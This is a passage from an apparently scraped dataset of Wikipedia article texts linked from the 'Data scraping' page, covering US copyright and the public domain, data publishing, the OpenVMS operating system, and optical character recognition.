criminal prosecution. Felony penalties for first offenses begin at seven copies for audiovisual works, and one hundred copies for sound recordings. 100 The US government, its agencies and officials, and corporations owned or controlled by it, are subject to suit for copyright infringement. All infringement claims against the U.S. that did not arise in a foreign country must be filed with the United States Court of Federal Claims within three years of the infringing action. 101 Claims filed in the wrong court are dismissed for lack of subject-matter jurisdiction. The government and its agencies are also authorized to settle the infringement claims out of court. The states have sovereign immunity provided by the Eleventh Amendment to the United States Constitution, which bars most forms of lawsuits against states in federal courts, but can be abrogated in certain circumstances by Congress. 102 103 104 The Copyright Remedy and Clarification Act of 1990 (CRCA) states in part that states are liable to copyright infringement "in the same manner and to the same extent as any nongovernmental entity" 105 and also that states and state entities and officials "shall not be immune, under the Eleventh Amendment to the Constitution of the United States or under any other doctrine of sovereign immunity, from suit in Federal Court by any person" 106 alleging copyright infringement. 107 : 1 The CRCA has been declared unconstitutional by several federal courts., 107 : 4 and this was upheld by the US Supreme Court on March 23, 2020. 108 As a result of the ruling Nautilus Productions, the plaintiff in Allen v. Cooper filed a motion for reconsideration in the United States District Court for the Eastern District of North Carolina. 109 On August 18, 2021, Judge Terrence Boyle granted the motion for reconsideration which North Carolina promptly appealed to the United States Court of Appeals for the Fourth Circuit. 110 The 4th Circuit denied the state's motion on October 14, 2022. 111 Nautilus then filed their second amended complaint on February 8, 2023, alleging 5th and 14th Amendment violations of Nautilus' constitutional rights, additional copyright violations, and claiming that North Carolina's "Blackbeard's Law" represents a Bill of Attainder. 112 113 Eight years after the passage of Blackbeard's Law, on June 30, 2023, North Carolina Gov. Roy Cooper signed a bill repealing the law. 114 Works in the public domain are free for anyone to copy and use. Strictly speaking, the term "public domain" means that the work is not covered by any intellectual property rights at all (copyright, trademark, patent, or otherwise). 115 However, this article discusses public domain with respect to copyright only. A work may enter the public domain in a number of different ways. For example, (a) the copyright protecting the work may have expired, or (b) the owner may have explicitly donated the work to the public, or (c) the work is not the type of work that copyright can protect. The "orphan works" problem arose in the United States with the enactment of the Copyright Act of 1976, which eliminated the need to register copyrighted works, instead declaring that all "original works of authorship fixed in any tangible medium of expression" 1 fall into copyright status. The elimination of registration also eliminated a central recording location to track and identify copyright-holders. Consequently, potential users of copyrighted works, e.g., filmmakers or biographers, must assume that many works they might use are copyrighted. Where the planned use would not be otherwise permitted by law (for example, by fair use), they must themselves individually investigate the copyright status of each work they plan to use. With no central database of copyright-holders, identifying and contacting copyright-holders can sometimes be difficult; those works that fall into this category may be considered "orphaned". Critics of copyright assert that copyright protections last too long before copyrighted works are allowed to enter into the public domain. For works published after 1977, the copyright lasts for the life of the author plus 70 years. 116 However, if the work is a work for hire (that is, the work is done in the course of employment or has been commissioned) or is published anonymously, the copyright lasts between 95 and 120 years, depending on the date the work is published. 116 In 2022, legislation introduced by Senator Josh Hawley, entitled the Copyright Clause Restoration Act of 2022, seeks to reduce the protection from 70 years after the creator's death (post 1978) and 95 years (pre 1978) to 28 years, with the option to renew it at the end of that term for a limit of 56 years total. 117 These same terms were in place from 1909 up until 1976. 118 A similar bill was also introduced in 2023. 119 |
391 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_publishing | Data publishing (also data publication) is the act of releasing research data in published form for use by others. It is a practice consisting in preparing certain data or data set(s) for public use thus to make them available to everyone to use as they wish. This practice is an integral part of the open science movement. There is a large and multidisciplinary consensus on the benefits resulting from this practice. 1 2 3 The main goal is to elevate data to be first class research outputs. 4 There are a number of initiatives underway as well as points of consensus and issues still in contention. 5 There are several distinct ways to make research data available, including: Publishing data allows researchers to both make their data available to others to use, and enables datasets to be cited similarly to other research publication types (such as articles or books), thereby enabling producers of datasets to gain academic credit for their work. The motivations for publishing data may range for a desire to make research more accessible, to enable citability of datasets, or research funder or publisher mandates that require open data publishing. The UK Data Service is one key organisation working with others to raise the importance of citing data correctly 7 and helping researchers to do so. Solutions to preserve privacy within data publishing has been proposed, including privacy protection algorithms, data ”masking” methods, and regional privacy level calculation algorithm. 8 A large number of journals and publishers support supplementary material being attached to research articles, including datasets. Though historically such material might have been distributed only by request or on microform to libraries, journals today typically host such material online. Supplementary material is available to subscribers to the journal or, if the article or journal is open access, to everyone. There are a large number of data repositories, on both general and specialized topics. Many repositories are disciplinary repositories, focused on a particular research discipline such as the UK Data Service which is a trusted digital repository of social, economic and humanities data. Repositories may be free for researchers to upload their data or may charge a one-time or ongoing fee for hosting the data. These repositories offer a publicly accessible web interface for searching and browsing hosted datasets, and may include additional features such as a digital object identifier, for permanent citation of the data, and linking to associated published papers and code. Data papers or data articles are “scholarly publication of a searchable metadata document describing a particular on-line accessible dataset, or a group of datasets, published in accordance to the standard academic practices”. 9 Their final aim is to provide “information on the what, where, why, how and who of the data”. 4 The intent of a data paper is to offer descriptive information on the related dataset(s) focusing on data collection, distinguishing features, access and potential reuse rather than on data processing and analysis. 10 Because data papers are considered academic publications no different than other types of papers, they allow scientists sharing data to receive credit in currency recognizable within the academic system, thus "making data sharing count". 11 This provides not only an additional incentive to share data, but also through the peer review process, increases the quality of metadata and thus reusability of the shared data. Thus data papers represent the scholarly communication approach to data sharing. Despite their potentiality, data papers are not the ultimate and complete solution for all the data sharing and reuse issues and, in some cases, they are considered to induce false expectations in the research community. 12 Data papers are supported by a rich array of data journals, some of which are "pure", i.e. they are dedicated to publish data papers only, while others the majority are "mixed", i.e. they publish a number of articles types including data papers. A comprehensive survey on data journals is available. 13 A non-exhaustive list of data journals has been compiled by staff at the University of Edinburgh. 14 Examples of "pure" data journals are: Earth System Science Data, Journal of Open Archaeology Data, Open Health Data, Polar Data Journal, and Scientific Data. Examples of "mixed" journals publishing data papers are: Biodiversity Data Journal, F1000Research, GigaScience, GigaByte, PLOS ONE, and SpringerPlus. Data citation is the provision of accurate, consistent and standardised referencing for datasets just as bibliographic citations are provided for other published sources like research articles or monographs. Typically the well established Digital Object Identifier (DOI) approach is used with DOIs taking users to a website that contains the metadata on the dataset and the dataset itself. 15 16 A 2011 paper reported an inability to determine how often data citation happened in social sciences. 17 2012 13 papers reported that data citation was becoming more common but the practice for it was not standard. 18 19 20 In 2014 FORCE 11 published the Joint Declaration of Data Citation Principles covering the purpose, function and attributes of data citation. 21 In October 2018 CrossRef expressed its support for cataloging datasets and recommending their citation. 22 A popular data-oriented journal reported in April 2019 that it would now use data citations. 23 A June 2019 paper suggested that increased data citation will make the practice more valuable for everyone by encouraging data sharing and also by increasing the prestige of people who share. 24 Data citation is an emerging topic in computer science and it has been defined as a computational problem. 25 Indeed, citing data poses significant challenges to computer scientists and the main problems to address are related to: 26 |
392 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/VAX/VMS | OpenVMS, often referred to as just VMS, 9 is a multi-user, multiprocessing and virtual memory-based operating system. It is designed to support time-sharing, batch processing, transaction processing and workstation applications. 10 Customers using OpenVMS include banks and financial services, hospitals and healthcare, telecommunications operators, network information services, and industrial manufacturers. 11 12 During the 1990s and 2000s, there were approximately half a million VMS systems in operation worldwide. 13 14 15 It was first announced by Digital Equipment Corporation (DEC) as VAX VMS (Virtual Address eXtension Virtual Memory System 16 ) alongside the VAX 11 780 minicomputer in 1977. 17 18 19 OpenVMS has subsequently been ported to run on DEC Alpha systems, the Itanium-based HPE Integrity Servers, 20 and select x86 64 hardware and hypervisors. 21 Since 2014, OpenVMS is developed and supported by VMS Software Inc. (VSI). 22 23 OpenVMS offers high availability through clustering—the ability to distribute the system over multiple physical machines. 24 This allows clustered applications and data to remain continuously available while operating system software and hardware maintenance and upgrades are performed, 25 or if part of the cluster is destroyed. 26 VMS cluster uptimes of 17 years have been reported. 27 In April 1975, Digital Equipment Corporation embarked on a project to design a 32 bit extension to its PDP 11 computer line. The hardware component was code named Star; the operating system was code named Starlet. Roger Gourd was the project lead for VMS. Software engineers Dave Cutler, Dick Hustvedt, and Peter Lipman acted as technical project leaders. 28 The Star and Starlet projects culminated in the VAX 11 780 computer and the VAX VMS operating system. The Starlet project's code name survives in VMS in the name of several of the system libraries, including STARLET.OLB and STARLET.MLB. 29 VMS was mostly written in VAX MACRO with some components written in BLISS. 9 One of the original goals for VMS was backward compatibility with DEC's existing RSX 11M operating system. 9 Prior to the V3.0 release, VAX VMS included a compatibility layer named the RSX Application Migration Executive (RSX AME), which allowed user-mode RSX 11M software to be run unmodified on top of VMS. 30 The RSX AME played an important role on early versions of VAX VMS, which used certain RSX 11M user-mode utilities before native VAX versions had been developed. 9 By the V3.0 release, all compatibility-mode utilities were replaced with native implementations. 31 In VAX VMS V4.0, RSX AME was removed from the base system, and replaced with an optional layered product named VAX 11 RSX. 32 A number of distributions of VAX VMS were created: With the V5.0 release in April 1988, DEC began to refer to VAX VMS as simply VMS in its documentation. 47 In July 1992, 48 DEC renamed VAX VMS to OpenVMS as an indication of its support of open systems industry standards such as POSIX and Unix compatibility, 49 and to drop the VAX connection since a migration to a different architecture was underway. The OpenVMS name was first used with the OpenVMS AXP V1.0 release in November 1992. DEC began using the OpenVMS VAX name with the V6.0 release in June 1993. 50 During the 1980s, DEC planned to replace the VAX platform and the VMS operating system with the PRISM architecture and the MICA operating system. 52 When these projects were cancelled in 1988, a team was set up to design new VAX VMS systems of comparable performance to RISC-based Unix systems. 53 After a number of failed attempts to design a faster VAX-compatible processor, the group demonstrated the feasibility of porting VMS and its applications to a RISC architecture based on PRISM. 54 This led to the creation of the Alpha architecture. 55 The project to port VMS to Alpha began in 1989, and first booted on a prototype Alpha EV3 based Alpha Demonstration Unit in early 1991. 54 56 The main challenge in porting VMS to a new architecture was that VMS and the VAX were designed together, meaning that VMS was dependent on certain details of the VAX architecture. 57 Furthermore, a significant amount of the VMS kernel, layered products, and customer-developed applications were implemented in VAX MACRO assembly code. 9 Some of the changes needed to decouple VMS from the VAX architecture included the creation of the MACRO 32 compiler, which treated VAX MACRO as a high-level language, and compiled it to Alpha object code, 58 and the emulation of certain low-level details of the VAX architecture in PALcode, such as interrupt handling and atomic queue instructions. The VMS port to Alpha resulted in the creation of two separate codebases: one for VAX, and another for Alpha. 4 The Alpha code library was based on a snapshot of the VAX VMS code base circa V5.4 2. 59 1992 saw the release of the first version of OpenVMS for Alpha AXP systems, designated OpenVMS AXP V1.0. In 1994, with the release of OpenVMS V6.1, feature (and version number) parity between the VAX and Alpha variants was achieved; this was the so-called Functional Equivalence release. 59 The decision to use the 1.x version numbering stream for the pre-production quality releases of OpenVMS AXP confused some customers, and was not repeated in the subsequent ports of OpenVMS to new platforms. 57 When VMS was ported to Alpha, it was initially left as a 32 bit only operating system. 58 This was done to ensure backwards compatibility with software written for the 32 bit VAX. 64 bit addressing was first added for Alpha in the V7.0 release. 60 In order to allow 64 bit code to interoperate with older 32 bit code, OpenVMS does not create a distinction between 32 bit and 64 bit executables, but instead allows for both 32 bit and 64 bit pointers to be used within the same code. 61 This is known as mixed pointer support. The 64 bit OpenVMS Alpha releases support a maximum virtual address space size of 8TiB (a 43 bit address space), which is the maximum supported by the Alpha 21064 and Alpha 21164. 62 One of the more noteworthy Alpha-only features of OpenVMS was OpenVMS Galaxy, which allowed the partitioning of a single SMP server to run multiple instances of OpenVMS. Galaxy supported dynamic resource allocation to running partitions, and the ability to share memory between partitions. 63 64 In 2001, prior to its acquisition by Hewlett-Packard, Compaq announced the port of OpenVMS to the Intel Itanium architecture. 65 The Itanium port was the result of Compaq's decision to discontinue future development of the Alpha architecture in favour of adopting the then-new Itanium architecture. 66 The porting began in late 2001, and the first boot on took place on January 31, 2003. 67 The first boot consisted of booting a minimal system configuration on a HP i2000 workstation, logging in as the SYSTEM user, and running the DIRECTORY command. The Itanium port of OpenVMS supports specific models and configurations of HPE Integrity Servers. 10 The Itanium releases were originally named HP OpenVMS Industry Standard 64 for Integrity Servers, although the names OpenVMS I64 or OpenVMS for Integrity Servers are more commonly used. 68 The Itanium port was accomplished using source code maintained in common within the OpenVMS Alpha source code library, with the addition of conditional code and additional modules where changes specific to Itanium were required. 57 This required certain architectural dependencies of OpenVMS to be replaced, or emulated in software. Some of the changes included using the Extensible Firmware Interface (EFI) to boot the operating system, 69 reimplementing the functionality previously provided by Alpha PALcode inside the kernel, 70 using new executable file formats (Executable and Linkable Format and DWARF), 71 and adopting IEEE 754 as the default floating point format. 72 As with the VAX to Alpha port, a binary translator for Alpha to Itanium was made available, allowing user-mode OpenVMS Alpha software to be ported to Itanium in situations where it was not possible to recompile the source code. This translator is known as the Alpha Environment Software Translator (AEST), and it also supported translating VAX executables which had already been translated with VEST. 73 Two pre-production releases, OpenVMS I64 V8.0 and V8.1, were available on June 30, 2003, and on December 18, 2003. These releases were intended for HP organizations and third-party vendors involved with porting software packages to OpenVMS I64. The first production release, V8.2, was released in February 2005. V8.2 was also released for Alpha; subsequent V8.x releases of OpenVMS have maintained feature parity between the Alpha and Itanium architectures. 74 When VMS Software Inc. (VSI) announced that they had secured the rights to develop the OpenVMS operating system from HP, they also announced their intention to port OpenVMS to the x86 64 architecture. 75 The porting effort ran concurrently with the establishment of the company, as well as the development of VSI's own Itanium and Alpha releases of OpenVMS V8.4 x. The x86 64 port is targeted for specific servers from HPE and Dell, as well as certain virtual machine hypervisors. 76 Initial support was targeted for KVM and VirtualBox. Support for VMware was announced in 2020, and Hyper-V is being explored as a future target. 77 In 2021, the x86 64 port was demonstrated running on an Intel Atom-based single-board computer. 78 As with the Alpha and Itanium ports, the x86 64 port made some changes to simplify porting and supporting OpenVMS on the new platform including: replacing the proprietary GEM compiler backend used by the VMS compilers with LLVM, 79 changing the boot process so that OpenVMS is booted from a memory disk, 80 and simulating the four privilege levels of OpenVMS in software since only two of x86 64's privilege levels are usable by OpenVMS. 70 The first boot was announced on May 14, 2019. This involved booting OpenVMS on VirtualBox, and successfully running the DIRECTORY command. 81 In May 2020, the V9.0 Early Adopter's Kit release was made available to a small number of customers. This consisted of the OpenVMS operating system running in a VirtualBox VM with certain limitations; most significantly, few layered products were available, and code can only be compiled for x86 64 using cross compilers which run on Itanium-based OpenVMS systems. 21 Following the V9.0 release, VSI released a series of updates on a monthly or bimonthly basis which added additional functionality and hypervisor support. These were designated V9.0 A through V9.0 H. 82 In June 2021, VSI released the V9.1 Field Test, making it available to VSI's customers and partners. 83 V9.1 shipped as an ISO image which can be installed onto a variety of hypervisors, and onto HPE ProLiant DL380 servers starting with the V9.1 A release. 84 During the 1980s, the MICA operating system for the PRISM architecture was intended to be the eventual successor to VMS. MICA was designed to maintain backwards compatibility with VMS applications while also supporting Ultrix applications on top of the same kernel. 85 MICA was ultimately cancelled along with the rest of the PRISM platform, leading Dave Cutler to leave DEC for Microsoft. At Microsoft, Cutler led the creation of the Windows NT operating system, which was heavily inspired by the architecture of MICA. 86 As a result, VMS is considered an ancestor of Windows NT, together with RSX 11, VAXELN and MICA, and many similarities exist between VMS and NT. 87 A now-defunct project named FreeVMS attempted to develop an open-source operating system following VMS conventions. 88 89 FreeVMS was built on top of the L4 microkernel and supported the x86 64 architecture. Prior work investigating the implementation of VMS using a microkernel-based architecture had previously been undertaken as a prototyping exercise by DEC employees with assistance from Carnegie Mellon University using the Mach 3.0 microkernel ported to VAXstation 3100 hardware, adopting a multiserver architectural model. 90 The OpenVMS operating system has a layered architecture, consisting of a privileged Executive, an intermediately privileged Command Language Interpreter, and unprivileged utilities and run-time libraries (RTLs). 91 Unprivileged code typically invokes the functionality of the Executive through system services (equivalent to system calls in other operating systems). OpenVMS' layers and mechanisms are built around certain features of the VAX architecture, including: 91 92 These VAX architecture mechanisms are implemented on Alpha, Itanium and x86 64 by either mapping to corresponding hardware mechanisms on those architectures, or through emulation (via PALcode on Alpha, or in software on Itanium and x86 64). 70 The OpenVMS Executive comprises the privileged code and data structures which reside in the system space. The Executive is further subdivided between the Kernel, which consists of the code which runs at the kernel access mode, and the less-privileged code outside of the Kernel which runs at the executive access mode. 91 The components of the Executive which run at executive access mode include the Record Management Services, and certain system services such as image activation. The main distinction between the kernel and executive access modes is that most of the operating system's core data structures can be read from executive mode, but require kernel mode to be written to. 92 Code running at executive mode can switch to kernel mode at will, meaning that the barrier between the kernel and executive modes is intended as a safeguard against accidental corruption as opposed to a security mechanism. 93 The Kernel comprises the operating system's core data structures (e.g. page tables, the I O database and scheduling data), and the routines which operate on these structures. The Kernel is typically described as having three major subsystems: I O, Process and Time Management, Memory Management. 91 92 In addition, other functionality such as logical name management, synchronization and system service dispatch are implemented inside the Kernel. OpenVMS allows user-mode code with suitable privileges to switch to executive or kernel mode using the CMEXEC and CMKRNL system services, respectively. 94 This allows code outside of system space to have direct access to the Executive's routines and system services. In addition to allowing third-party extensions to the operating system, Privileged Images are used by core operating system utilities to manipulate operating system data structures through undocumented interfaces. 95 The typical user and application interface into the file system is the Record Management Services (RMS), although applications can interface directly with the underlying file system through the QIO system services. 96 The file systems supported by VMS are referred to as the Files 11 On-Disk Structures (ODS), the most significant of which are ODS 2 and ODS 5. 97 VMS is also capable of accessing files on ISO 9660 CD-ROMs and magnetic tape with ANSI tape labels. 98 Files 11 is limited to 2 TiB volumes. 97 DEC attempted to replace it with a log-structured file system named Spiralog, first released in 1995. 99 However, Spiralog was discontinued due to a variety of problems, including issues with handling full volumes. 100 Instead, there has been discussion of porting the open-source GFS2 file system to OpenVMS. 101 An OpenVMS Command Language Interpreter (CLI) implements a command-line interface for OpenVMS, responsible for executing individual commands and command procedures (equivalent to shell scripts or batch files). 102 The standard CLI for OpenVMS is the DIGITAL Command Language, although other options are available. Unlike Unix shells, which typically run in their own isolated process and behave like any other user-mode program, OpenVMS CLIs are an optional component of a process, which exist alongside any executable image which that process may run. 103 Whereas a Unix shell will typically run executables by creating a separate process using fork-exec, an OpenVMS CLI will typically load the executable image into the same process, transfer control to the image, and ensure that control is transferred back to CLI once the image has exited and that the process is returned to its original state. 91 Because the CLI is loaded into the same address space as user code, and the CLI is responsible for invoking image activation and image rundown, the CLI is mapped into the process address space at supervisor access mode, a higher level of privilege than most user code. This is in order to prevent accidental or malicious manipulation of the CLI's code and data structures by user-mode code. 91 103 OpenVMS supports clustering (first called VAXcluster and later VMScluster), where multiple computers run their own instance of the operating system. Clustered computers (nodes) may be fully independent from each other, or they may share devices like disk drives and printers. Communication across nodes provides a single system image abstraction. 104 Nodes may be connected to each other via a proprietary hardware connection called Cluster Interconnect or via a standard Ethernet LAN. OpenVMS supports up to 96 nodes in a single cluster. It also allows mixed-architecture clusters. 24 OpenVMS clusters allow applications to function during planned or unplanned outages. 105 Planned outages include hardware and software upgrades. 106 The DECnet protocol suite is tightly integrated into VMS, allowing remote logins, as well as transparent access to files, printers and other resources on VMS systems over a network. 107 VAX VMS V1.0 featured support for DECnet Phase II, 108 and modern versions of VMS support both the traditional Phase IV DECnet protocol, as well as the OSI-compatible Phase V (also known as DECnet-Plus). 109 Support for TCP IP is provided by the optional TCP IP Services for OpenVMS layered product (originally known as the VMS ULTRIX Connection, then as the ULTRIX Communications Extensions or UCX). 110 111 TCP IP Services is based on a port of the BSD network stack to OpenVMS, 112 along with support for common protocols such as SSH, DHCP, FTP and SMTP. DEC sold a software package named PATHWORKS (originally known as the Personal Computer Systems Architecture or PCSA) which allowed personal computers running MS-DOS, Microsoft Windows or OS 2, or the Apple Macintosh to serve as a terminal for VMS systems, or to use VMS systems as a file or print server. 113 PATHWORKS was later renamed to Advanced Server for OpenVMS, and was eventually replaced with a VMS port of Samba at the time of the Itanium port. 114 DEC provided the Local Area Transport (LAT) protocol which allowed remote terminals and printers to be attached to a VMS system through a terminal server such as one of the DECserver family. 115 DEC (and its successor companies) provided a wide variety of programming languages for VMS. Officially supported languages on VMS, either current or historical, include: 116 117 Among OpenVMS's notable features is the Common Language Environment, a strictly defined standard that specifies calling conventions for functions and routines, including use of stacks, registers, etc., independent of programming language. 118 Because of this, it is possible to call a routine written in one language (for example, Fortran) from another (for example, COBOL), without needing to know the implementation details of the target language. OpenVMS itself is implemented in a variety of different languages and the common language environment and calling standard supports freely mixing these languages. 119 DEC created a tool named the Structure Definition Language (SDL), which allowed data type definitions to be generated for different languages from a common definition. 120 DEC provided a collection of software development tools in a layered product named DECset (originally named VAXset). 116 This consisted of the following tools: 121 The OpenVMS Debugger supports all DEC compilers and many third-party languages. It allows breakpoints, watchpoints and interactive runtime program debugging using either a command line or graphical user interface. 123 A pair of lower-level debuggers, named DELTA and XDELTA, can be used to debug privileged code in additional to normal application code. 124 In 2019, VSI released an officially supported Integrated Development Environment for VMS based on Visual Studio Code. 76 This allows VMS applications to be developed and debugged remotely from a Microsoft Windows, macOS or Linux workstation. 125 DEC created a number of optional database products for VMS, some of which were marketed as the VAX Information Architecture family. 126 These products included: In 1994, DEC sold Rdb, DBMS and CDD to Oracle, where they remain under active development. 131 In 1995, DEC sold DSM to InterSystems, who renamed it Open M, and eventually replaced it with their Cach product. 132 Examples of third-party database management systems for OpenVMS include MariaDB, 133 Mimer SQL 134 (Itanium and x86 64 135 ), and System 1032. 136 VMS was originally designed to be used and managed interactively using DEC's text-based video terminals such as the VT100, or hardcopy terminals such as the DECwriter series. Since the introduction of the VAXstation line in 1984, VMS has optionally supported graphical user interfaces for use with workstations or X terminals such as the VT1000 series. The DIGITAL Command Language (DCL) has served as the primary command language interpreter (CLI) of OpenVMS since the first release. 137 30 10 Other official CLIs available for VMS include the RSX 11 Monitor Console Routine (MCR) (VAX only), and various Unix shells. 116 DEC provided tools for creating text-based user interface applications the Form Management System (FMS) and Terminal Data Management System (TDMS), later succeeded by DECforms. 138 139 140 A lower level interface named Screen Management Services (SMG ), comparable to Unix curses, also exists. 141 Over the years, VMS has gone through a number of different GUI toolkits and interfaces: Versions of VMS running on DEC Alpha workstations in the 1990s supported OpenGL 152 and Accelerated Graphics Port (AGP) graphics adapters. VMS also provides support for older graphics standards such as GKS and PHIGS. 153 154 Modern versions of DECwindows are based on X.Org Server. 10 OpenVMS provides various security features and mechanisms, including security identifiers, resource identifiers, subsystem identifiers, ACLs, intrusion detection and detailed security auditing and alarms. 155 Specific versions evaluated at Trusted Computer System Evaluation Criteria Class C2 and, with the SEVMS security enhanced release at Class B1. 156 OpenVMS also holds an ITSEC E3 rating (see NCSC and Common Criteria). 157 Passwords are hashed using the Purdy Polynomial. Various official Unix and POSIX compatibility layers were created for VMS. The first of these was DEC Shell, which was a layered product consisting of ports of the Bourne shell from Version 7 Unix and several other Unix utilities to VAX VMS. 116 In 1992, DEC released the POSIX for OpenVMS layered product, which included a shell based on the KornShell. 164 POSIX for OpenVMS was later replaced by the open-source GNV (GNU's not VMS) project, which was first included in OpenVMS media in 2002. 165 Amongst other GNU tools, GNV includes a port of the Bash shell to VMS. 166 Examples of third-party Unix compatibility layers for VMS include Eunice. 167 In 1997, OpenVMS and a number of layered products were made available free of charge for hobbyist, non-commercial use as part of the OpenVMS Hobbyist Program. 168 Since then, several companies producing OpenVMS software have made their products available under the same terms, such as Process Software. 169 Prior to the x86 64 port, the age and cost of hardware capable of running OpenVMS made emulators such as SIMH a common choice for hobbyist installations. 170 In March 2020, HPE announced the end of the OpenVMS Hobbyist Program. 171 This was followed by VSI's announcement of the Community License Program (CLP) in April 2020, which was intended as a replacement for the HPE Hobbyist Program. 172 The CLP was launched in July 2020, and provides licenses for VSI OpenVMS releases on Alpha, Integrity and x86 64 systems. 173 OpenVMS for VAX is not covered by the CLP, since there are no VSI releases of OpenVMS VAX, and the old versions are still owned by HPE. 174 |
393 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Optical_character_recognition | Optical character recognition or optical character reader (OCR) is the electronic or mechanical conversion of images of typed, handwritten or printed text into machine-encoded text, whether from a scanned document, a photo of a document, a scene photo (for example the text on signs and billboards in a landscape photo) or from subtitle text superimposed on an image (for example: from a television broadcast). 1 Widely used as a form of data entry from printed paper data records whether passport documents, invoices, bank statements, computerized receipts, business cards, mail, printed data, or any suitable documentation it is a common method of digitizing printed texts so that they can be electronically edited, searched, stored more compactly, displayed online, and used in machine processes such as cognitive computing, machine translation, (extracted) text-to-speech, key data and text mining. OCR is a field of research in pattern recognition, artificial intelligence and computer vision. Early versions needed to be trained with images of each character, and worked on one font at a time. Advanced systems capable of producing a high degree of accuracy for most fonts are now common, and with support for a variety of image file format inputs. 2 Some systems are capable of reproducing formatted output that closely approximates the original page including images, columns, and other non-textual components. Early optical character recognition may be traced to technologies involving telegraphy and creating reading devices for the blind. 3 In 1914, Emanuel Goldberg developed a machine that read characters and converted them into standard telegraph code. 4 Concurrently, Edmund Fournier d'Albe developed the Optophone, a handheld scanner that when moved across a printed page, produced tones that corresponded to specific letters or characters. 5 In the late 1920s and into the 1930s, Emanuel Goldberg developed what he called a "Statistical Machine" for searching microfilm archives using an optical code recognition system. In 1931, he was granted US Patent number 1,838,389 for the invention. The patent was acquired by IBM. In 1974, Ray Kurzweil started the company Kurzweil Computer Products, Inc. and continued development of omni-font OCR, which could recognize text printed in virtually any font. (Kurzweil is often credited with inventing omni-font OCR, but it was in use by companies, including CompuScan, in the late 1960s and 1970s. 3 6 ) Kurzweil used the technology to create a reading machine for blind people to have a computer read text to them out loud. The device included a CCD-type flatbed scanner and a text-to-speech synthesizer. On January 13, 1976, the finished product was unveiled during a widely reported news conference headed by Kurzweil and the leaders of the National Federation of the Blind. citation needed In 1978, Kurzweil Computer Products began selling a commercial version of the optical character recognition computer program. LexisNexis was one of the first customers, and bought the program to upload legal paper and news documents onto its nascent online databases. Two years later, Kurzweil sold his company to Xerox, which eventually spun it off as Scansoft, which merged with Nuance Communications. In the 2000s, OCR was made available online as a service (WebOCR), in a cloud computing environment, and in mobile applications like real-time translation of foreign-language signs on a smartphone. With the advent of smartphones and smartglasses, OCR can be used in internet connected mobile device applications that extract text captured using the device's camera. These devices that do not have built-in OCR functionality will typically use an OCR API to extract the text from the image file captured by the device. 7 8 The OCR API returns the extracted text, along with information about the location of the detected text in the original image back to the device app for further processing (such as text-to-speech) or display. Various commercial and open source OCR systems are available for most common writing systems, including Latin, Cyrillic, Arabic, Hebrew, Indic, Bengali (Bangla), Devanagari, Tamil, Chinese, Japanese, and Korean characters. OCR engines have been developed into software applications specializing in various subjects such as receipts, invoices, checks, and legal billing documents. The software can be used for: OCR is generally an offline process, which analyses a static document. There are cloud based services which provide an online OCR API service. Handwriting movement analysis can be used as input to handwriting recognition. 14 Instead of merely using the shapes of glyphs and words, this technique is able to capture motion, such as the order in which segments are drawn, the direction, and the pattern of putting the pen down and lifting it. This additional information can make the process more accurate. This technology is also known as "online character recognition", "dynamic character recognition", "real-time character recognition", and "intelligent character recognition". OCR software often pre-processes images to improve the chances of successful recognition. Techniques include: 15 Segmentation of fixed-pitch fonts is accomplished relatively simply by aligning the image to a uniform grid based on where vertical grid lines will least often intersect black areas. For proportional fonts, more sophisticated techniques are needed because whitespace between letters can sometimes be greater than that between words, and vertical lines can intersect more than one character. 22 There are two basic types of core OCR algorithm, which may produce a ranked list of candidate characters. 23 Software such as Cuneiform and Tesseract use a two-pass approach to character recognition. The second pass is known as adaptive recognition and uses the letter shapes recognized with high confidence on the first pass to better recognize the remaining letters on the second pass. This is advantageous for unusual fonts or low-quality scans where the font is distorted (e.g. blurred or faded). 22 As of December 2016 update , modern OCR software includes Google Docs OCR, ABBYY FineReader, and Transym. 26 needs update Others like OCRopus and Tesseract use neural networks which are trained to recognize whole lines of text instead of focusing on single characters. A technique known as iterative OCR automatically crops a document into sections based on the page layout. OCR is then performed on each section individually using variable character confidence level thresholds to maximize page-level OCR accuracy. A patent from the United States Patent Office has been issued for this method. 27 The OCR result can be stored in the standardized ALTO format, a dedicated XML schema maintained by the United States Library of Congress. Other common formats include hOCR and PAGE XML. For a list of optical character recognition software, see Comparison of optical character recognition software. OCR accuracy can be increased if the output is constrained by a lexicon a list of words that are allowed to occur in a document. 15 This might be, for example, all the words in the English language, or a more technical lexicon for a specific field. This technique can be problematic if the document contains words not in the lexicon, like proper nouns. Tesseract uses its dictionary to influence the character segmentation step, for improved accuracy. 22 The output stream may be a plain text stream or file of characters, but more sophisticated OCR systems can preserve the original layout of the page and produce, for example, an annotated PDF that includes both the original image of the page and a searchable textual representation. Near-neighbor analysis can make use of co-occurrence frequencies to correct errors, by noting that certain words are often seen together. 28 For example, "Washington, D.C. is generally far more common in English than "Washington DOC". Knowledge of the grammar of the language being scanned can also help determine if a word is likely to be a verb or a noun, for example, allowing greater accuracy. The Levenshtein Distance algorithm has also been used in OCR post-processing to further optimize results from an OCR API. 29 In recent years, when? the major OCR technology providers began to tweak OCR systems to deal more efficiently with specific types of input. Beyond an application-specific lexicon, better performance may be had by taking into account business rules, standard expression, clarification needed or rich information contained in color images. This strategy is called "Application-Oriented OCR" or "Customized OCR", and has been applied to OCR of license plates, invoices, screenshots, ID cards, driver's licenses, and automobile manufacturing. The New York Times has adapted the OCR technology into a proprietary tool they entitle Document Helper, that enables their interactive news team to accelerate the processing of documents that need to be reviewed. They note that it enables them to process what amounts to as many as 5,400 pages per hour in preparation for reporters to review the contents. 30 There are several techniques for solving the problem of character recognition by means other than improved OCR algorithms. Special fonts like OCR-A, OCR-B, or MICR fonts, with precisely specified sizing, spacing, and distinctive character shapes, allow a higher accuracy rate during transcription in bank check processing. Several prominent OCR engines were designed to capture text in popular fonts such as Arial or Times New Roman, and are incapable of capturing text in these fonts that are specialized and very different from popularly used fonts. As Google Tesseract can be trained to recognize new fonts, it can recognize OCR-A, OCR-B and MICR fonts. 31 Comb fields are pre-printed boxes that encourage humans to write more legibly one glyph per box. 28 These are often printed in a dropout color which can be easily removed by the OCR system. 28 Palm OS used a special set of glyphs, known as Graffiti, which are similar to printed English characters but simplified or modified for easier recognition on the platform's computationally limited hardware. Users would need to learn how to write these special glyphs. Zone-based OCR restricts the image to a specific part of a document. This is often referred to as Template OCR. Crowdsourcing humans to perform the character recognition 